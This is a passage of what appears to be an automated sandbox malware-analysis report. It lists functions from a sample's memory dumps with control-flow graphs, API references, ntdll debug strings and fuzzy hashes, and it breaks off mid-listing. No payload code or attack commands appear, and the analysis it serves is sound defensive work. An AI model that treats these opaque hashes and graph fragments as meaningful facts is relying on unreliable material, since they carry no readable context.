                                                                                                • Instruction ID: ca2950ffc6f7621a663dd4fd892a815da482a9c048f938f966eb6cd95ef0a23f
                                                                                                • Opcode Fuzzy Hash: b1c4b9ee07d9d5f4dc170aae1fe22939b28036dad3b3f75c7ccb7754df574fba
                                                                                                • Instruction Fuzzy Hash: D590023120148902D1107158844474E500697E0301F99C412A442465DDC7A589917221
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01472C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 5 1472c1d-1472c26 LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0148FD4F,000000FF,00000024,01526634,00000004,00000000,?,-00000018,7D810F61,?,?,01448B12,?,?,?,?), ref: 01472C24
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 6fdb7261ee4b0ec17d90a6084141932182df797d54dbb524538b30b5ed8de9ad
                                                                                                • Instruction ID: 9539379fa4fa4b597a3f01358227413335d855f664bb775a0b276b6b842c4298
                                                                                                • Opcode Fuzzy Hash: 6fdb7261ee4b0ec17d90a6084141932182df797d54dbb524538b30b5ed8de9ad
                                                                                                • Instruction Fuzzy Hash: EFA00231441207578241AA64448446DE195BAE0321389C346E1568446A876C14E2B661
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00429BAE Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 9 429bae-429bca 10 429bd9-429be0 9->10 11 429bef-429bf4 10->11 12 429c43-429c48 11->12 13 429bf6-429bff 11->13 14 429c0e-429c13 13->14 15 429c26-429c2c 14->15 16 429c15-429c23 14->16 18 429c32-429c40 15->18 16->15 18->12
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: n
                                                                                                • API String ID: 0-2013832146
                                                                                                • Opcode ID: 9f58b8f922cb7525c846a42a0844a0b2ef168dda75917856b471b06fe627f162
                                                                                                • Instruction ID: c65eff18ec65f842759419cc0f9eb9e377a9476ad8e1064920eeedd022fc53ff
                                                                                                • Opcode Fuzzy Hash: 9f58b8f922cb7525c846a42a0844a0b2ef168dda75917856b471b06fe627f162
                                                                                                • Instruction Fuzzy Hash: 9B012DB1D8161655EFB0E7619C02BFB73A44B44308F4502EAA518E1082EB7557C48F55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00429BB3 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 20 429bb3-429bf4 23 429c43-429c48 20->23 24 429bf6-429c13 20->24 26 429c26-429c2c 24->26 27 429c15-429c23 24->27 29 429c32-429c40 26->29 27->26 29->23
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: n
                                                                                                • API String ID: 0-2013832146
                                                                                                • Opcode ID: 4d80fc900f07905376807c3a6f0e42440d275066ab0ed6253200cbf2fe68381e
                                                                                                • Instruction ID: e188a9acde67a41b9bd356654aaffd5b34360ca137f4ae859789b739e50229b2
                                                                                                • Opcode Fuzzy Hash: 4d80fc900f07905376807c3a6f0e42440d275066ab0ed6253200cbf2fe68381e
                                                                                                • Instruction Fuzzy Hash: 0701ACF1D8122666EFB0E7519C42BFB73A44B04304F4502E9A51CD2182FF795BD84E55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00429DC6 Relevance: .1, Instructions: 107COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 31 429dc6-429dd9 32 429e36-429e3c 31->32 33 429ddb-429e04 31->33 35 429e10-429e35 32->35 36 429e3e-429e3f 32->36 35->32 37 429e41-429e64 36->37 37->37 38 429e66-429e67 37->38 39 429ee1 38->39 40 429e69-429e6d 38->40 41 429e6e-429e78 39->41 42 429ee3-429eeb 39->42 40->41 43 429f2c-429f5e 42->43 44 429eed-429eef 42->44 45 429f64-429f75 43->45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9943dab3e62b4aed2008f6ba5844f91fb3876c0dfaa46bd4337dbf76aeb40b4b
                                                                                                • Instruction ID: 17a25a44c27ff754529421d56013264b35c32330d7a7f1570b8474616ceb50ef
                                                                                                • Opcode Fuzzy Hash: 9943dab3e62b4aed2008f6ba5844f91fb3876c0dfaa46bd4337dbf76aeb40b4b
                                                                                                • Instruction Fuzzy Hash: 6931783150475ADFC715CF38E981ADABBA4FF44310F54428DEC988B296C734E915C788
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00429EE8 Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 46 429ee8-429eee 47 429ef0-429ef2 46->47 48 429ebb 46->48 49 429ef4-429efb 47->49 50 429f49-429f5e 47->50 51 429ed3-429ed6 48->51 52 429ebd-429ec5 48->52 53 429f13-429f16 49->53 54 429efd-429f05 49->54 55 429f64-429f75 50->55 52->51 56 429ec7-429ed1 52->56 54->53 58 429f07-429f11 54->58 56->51 57 429ed7-429edc 56->57 57->51 60 429ede-429ee7 57->60 58->53 59 429f17-429f1d 58->59 59->53 61 429f1f-429f23 59->61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: db112fbde83ce09b3ce70d395f317373682d8c639daee71dd5cc27b91ee55111
                                                                                                • Instruction ID: b3a8c3c017b5dab044f321e4dff8122420db29252853a1ff26d83ff67d0dc0bd
                                                                                                • Opcode Fuzzy Hash: db112fbde83ce09b3ce70d395f317373682d8c639daee71dd5cc27b91ee55111
                                                                                                • Instruction Fuzzy Hash: EA01B1307082948BDB60DB74E844967B7A5AB51709B9985EEE008CB6C3E3BDDC01C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00429F24 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 62 429f24-429f2f 63 429f35-429f5e 62->63 64 429f64-429f75 63->64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7075e2e241e7e6130563f685b354e16d25cb7141892e8ea63e553f1a7f86f40
                                                                                                • Instruction ID: 1029e4c46bbacde02664fda98761a84e23b3b381c640ab69d4d1dc666fe840cf
                                                                                                • Opcode Fuzzy Hash: b7075e2e241e7e6130563f685b354e16d25cb7141892e8ea63e553f1a7f86f40
                                                                                                • Instruction Fuzzy Hash: 08F030B6500608AFCB04DF69C885EDF77A9FF98220F048259F92CCB641E734E611CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00429F33 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 65 429f33-429f5e 66 429f64-429f75 65->66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ee88a26a2d5a8e0f04b1cb979bdebb3d2fbb33f30d010926c6c0c2a88e83c525
                                                                                                • Instruction ID: a12783c8d6730bfbb0e53b0c7a2d82afc8651e7b22fa8a15705ad0750921b60e
                                                                                                • Opcode Fuzzy Hash: ee88a26a2d5a8e0f04b1cb979bdebb3d2fbb33f30d010926c6c0c2a88e83c525
                                                                                                • Instruction Fuzzy Hash: 75F01CB2610209AFCB04CF59C885EEB73ADFB88750F04C159FD188B241D774EA10CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00429FC3 Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 67 429fc3-429fd6 68 429fdc-429fe0 67->68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5c2ecdeb5ab0abad48896c6f458c71b29306c8479d5e1f43dd335f6c3fbf9db7
                                                                                                • Instruction ID: fff7653e1831b08427e153d1f1a3b1e63341f607136b5aa56e6ae70c7ea38574
                                                                                                • Opcode Fuzzy Hash: 5c2ecdeb5ab0abad48896c6f458c71b29306c8479d5e1f43dd335f6c3fbf9db7
                                                                                                • Instruction Fuzzy Hash: E1C080716003087FD700EB8CDC46F7533DC9B08614F444059B90C8B341E570F9104758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 01472890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 265 1472890-14728b3 266 14aa4bc-14aa4c0 265->266 267 14728b9-14728cc 265->267 266->267 270 14aa4c6-14aa4ca 266->270 268 14728ce-14728d7 267->268 269 14728dd-14728df 267->269 268->269 271 14aa57e-14aa585 268->271 272 14728e1-14728e5 269->272 270->267 273 14aa4d0-14aa4d4 270->273 271->269 274 14728eb-14728fa 272->274 275 1472988-147298e 272->275 273->267 276 14aa4da-14aa4de 273->276 277 14aa58a-14aa58d 274->277 278 1472900-1472905 274->278 279 1472908-147290c 275->279 276->267 280 14aa4e4-14aa4eb 276->280 277->279 278->279 279->272 281 147290e-147291b 279->281 282 14aa4ed-14aa4f4 280->282 283 14aa564-14aa56c 280->283 286 1472921 281->286 287 14aa592-14aa599 281->287 284 14aa50b 282->284 285 14aa4f6-14aa4fe 282->285 283->267 288 14aa572-14aa576 283->288 290 14aa510-14aa536 call 1480050 284->290 285->267 289 14aa504-14aa509 285->289 291 1472924-1472926 286->291 293 14aa5a1-14aa5c9 call 1480050 287->293 288->267 292 14aa57c call 1480050 288->292 289->290 305 14aa55d-14aa55f 290->305 295 1472993-1472995 291->295 296 1472928-147292a 291->296 292->305 295->296 300 1472997-14729b1 call 1480050 295->300 302 1472946-1472966 call 1480050 296->302 303 147292c-147292e 296->303 314 1472969-1472974 300->314 302->314 303->302 308 1472930-1472944 call 1480050 303->308 312 1472981-1472985 305->312 308->302 314->291 316 1472976-1472979 314->316 316->293 317 147297f 316->317 317->312
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID:
                                                                                                • API String ID: 48624451-0
                                                                                                • Opcode ID: fb5cfbd676607eb29bd509e9abb2b7aa9b4429a7938bb11d6c327851be71ac2e
                                                                                                • Instruction ID: 7f79c82c0874ed2de6ce2855649a18dd3ea8bdc5275de4c1365001f70723bc69
                                                                                                • Opcode Fuzzy Hash: fb5cfbd676607eb29bd509e9abb2b7aa9b4429a7938bb11d6c327851be71ac2e
                                                                                                • Instruction Fuzzy Hash: 525106B1B00116AFCB11DF9D88809BFFBB8BB59240B64822BE495D7651D374DE41CBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0144A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 318 144a250-144a26f 319 144a275-144a291 318->319 320 144a58d-144a594 318->320 322 144a297-144a2a0 319->322 323 14979e6-14979eb 319->323 320->319 321 144a59a-14979bb 320->321 321->319 326 14979c1-14979c6 321->326 322->323 325 144a2a6-144a2ac 322->325 327 144a2b2-144a2b4 325->327 328 144a6ba-144a6bc 325->328 329 144a473-144a479 326->329 327->323 331 144a2ba-144a2bd 327->331 330 144a6c2 328->330 328->331 332 144a2c3-144a2c6 330->332 331->323 331->332 333 144a2c8-144a2d1 332->333 334 144a2da-144a2dd 332->334 335 14979cb-14979d5 333->335 336 144a2d7 333->336 337 144a6c7-144a6d0 334->337 338 144a2e3-144a32b 334->338 339 14979da-14979e3 call 14bf290 335->339 336->334 337->338 341 144a6d6-14979ff 337->341 340 144a330-144a335 338->340 339->323 344 144a47c-144a47f 340->344 345 144a33b-144a343 340->345 341->339 348 144a34f-144a35d 344->348 349 144a485-144a488 344->349 347 144a345-144a349 345->347 345->348 347->348 350 144a59f-144a5a8 347->350 351 144a363-144a368 348->351 352 144a48e-144a49e 348->352 349->352 353 1497a16-1497a19 349->353 355 144a5c0-144a5c3 350->355 356 144a5aa-144a5ac 350->356 357 144a36c-144a36e 351->357 352->353 354 144a4a4-144a4ad 352->354 353->357 358 1497a1f-1497a24 353->358 354->357 360 1497a01 355->360 361 144a5c9-144a5cc 355->361 356->348 359 144a5b2-144a5bb 356->359 362 144a374-144a38c call 144a6e0 357->362 363 1497a26 357->363 364 1497a2b 358->364 359->357 366 1497a0c 360->366 361->366 367 144a5d2-144a5d5 361->367 371 144a4b2-144a4b9 362->371 372 144a392-144a3ba 362->372 363->364 365 1497a2d-1497a2f 364->365 365->329 369 1497a35 365->369 366->353 367->356 373 144a3bc-144a3be 371->373 374 144a4bf-144a4c2 371->374 372->373 373->365 376 144a3c4-144a3cb 373->376 374->373 375 144a4c8-144a4d3 374->375 375->340 377 144a3d1-144a3d4 376->377 378 1497ae0 376->378 379 144a3e0-144a3ea 377->379 380 1497ae4-1497afc call 14bf290 378->380 379->380 381 144a3f0-144a40c call 144a840 379->381 380->329 386 144a5d7-144a5e0 381->386 387 144a412-144a417 381->387 389 144a601-144a603 386->389 390 144a5e2-144a5eb 386->390 387->329 388 144a419-144a43d 387->388 391 144a440-144a443 388->391 393 144a605-144a623 call 1434508 389->393 394 144a629-144a631 389->394 390->389 392 144a5ed-144a5f1 390->392 396 144a4d8-144a4dc 391->396 397 144a449-144a44c 391->397 398 144a5f7-144a5fb 392->398 399 144a681-144a6ab RtlDebugPrintTimes 392->399 393->329 393->394 401 1497a3a-1497a42 396->401 402 144a4e2-144a4e5 396->402 403 144a452-144a454 397->403 404 1497ad6 397->404 398->389 398->399 399->389 415 144a6b1-144a6b5 399->415 405 144a634-144a64a 401->405 406 1497a48-1497a4c 401->406 402->405 407 144a4eb-144a4ee 402->407 409 144a520-144a539 call 144a6e0 403->409 410 144a45a-144a461 403->410 404->378 411 144a4f4-144a50c 405->411 412 144a650-144a659 405->412 406->405 413 1497a52-1497a5b 406->413 407->397 407->411 427 144a65e-144a665 409->427 428 144a53f-144a567 409->428 416 144a467-144a46c 410->416 417 144a57b-144a582 410->417 411->397 422 144a512-144a51b 411->422 412->403 420 1497a5d-1497a60 413->420 421 1497a85-1497a87 413->421 415->389 416->329 418 144a46e 416->418 417->379 419 144a588 417->419 418->329 419->378 424 1497a6e-1497a71 420->424 425 1497a62-1497a6c 420->425 421->405 426 1497a8d-1497a96 421->426 422->403 432 1497a7e 424->432 433 1497a73-1497a7c 424->433 431 1497a81 425->431 426->403 429 144a569-144a56b 427->429 430 144a66b-144a66e 427->430 428->429 429->416 435 144a571-144a573 429->435 430->429 434 144a674-144a67c 430->434 431->421 432->431 433->426 434->391 436 1497a9b-1497aa4 435->436 437 144a579 435->437 436->437 438 1497aaa-1497ab0 436->438 437->417 438->437 439 1497ab6-1497abe 438->439 439->437 440 1497ac4-1497acf 439->440 440->439 441 1497ad1 440->441 441->437
                                                                                                Strings
                                                                                                • SsHd, xrefs: 0144A3E4
                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 014979D0, 014979F5
                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014979FA
                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014979D5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                • API String ID: 0-929470617
                                                                                                • Opcode ID: 3bfd6640b7ef4abf37bbf650cd9ce816528c8fa08e1b86a718f562ec002383b9
                                                                                                • Instruction ID: c7d494b778ecefd769842644bc52df1d68fca014b5455d22fb80708460cdd14a
                                                                                                • Opcode Fuzzy Hash: 3bfd6640b7ef4abf37bbf650cd9ce816528c8fa08e1b86a718f562ec002383b9
                                                                                                • Instruction Fuzzy Hash: 15E1A3716443018FFB25CE68C884B6BBBE1BB84354F244A2FE996CB3A1D735D9458B81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0144D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01499341, 01499366
                                                                                                • GsHd, xrefs: 0144D874
                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0149936B
                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01499346
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                • API String ID: 3446177414-576511823
                                                                                                • Opcode ID: 08a7d7640716cbe69a69852c984f321b55681c1c1a544f45c7a5aae38c5ffed1
                                                                                                • Instruction ID: 0251514911f9ce60b4fb0caf1d6a501b38864b60f23cac73263daed4b864dd06
                                                                                                • Opcode Fuzzy Hash: 08a7d7640716cbe69a69852c984f321b55681c1c1a544f45c7a5aae38c5ffed1
                                                                                                • Instruction Fuzzy Hash: 77E1B175A043028FEB25CF59C480B6BBBE5BF98318F04492EE995CB3A1D771E845CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0147B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                • Instruction ID: b632b0a6adb3ea7718f487897bfcf05c7f871ba78d0ecaad227d02c259121db0
                                                                                                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                • Instruction Fuzzy Hash: 9081B070E052499EEF258E6CC8917FFBBB2EF45320F18425BD965A73B1C73498418B62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01439126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $$@
                                                                                                • API String ID: 3446177414-1194432280
                                                                                                • Opcode ID: ccd7df3a8a05f9bc253a8275062105cc7c6af38451b94501c535accaca7c4ad7
                                                                                                • Instruction ID: 9a4491055c70d8de794fc40fe949290fd97c223e611bce3e6f49e5b98b109bdb
                                                                                                • Opcode Fuzzy Hash: ccd7df3a8a05f9bc253a8275062105cc7c6af38451b94501c535accaca7c4ad7
                                                                                                • Instruction Fuzzy Hash: 3F810A76D002699BEB318F54CC44BEABBB4AB58714F0441DBEA19B7290D7709E85CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0145DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
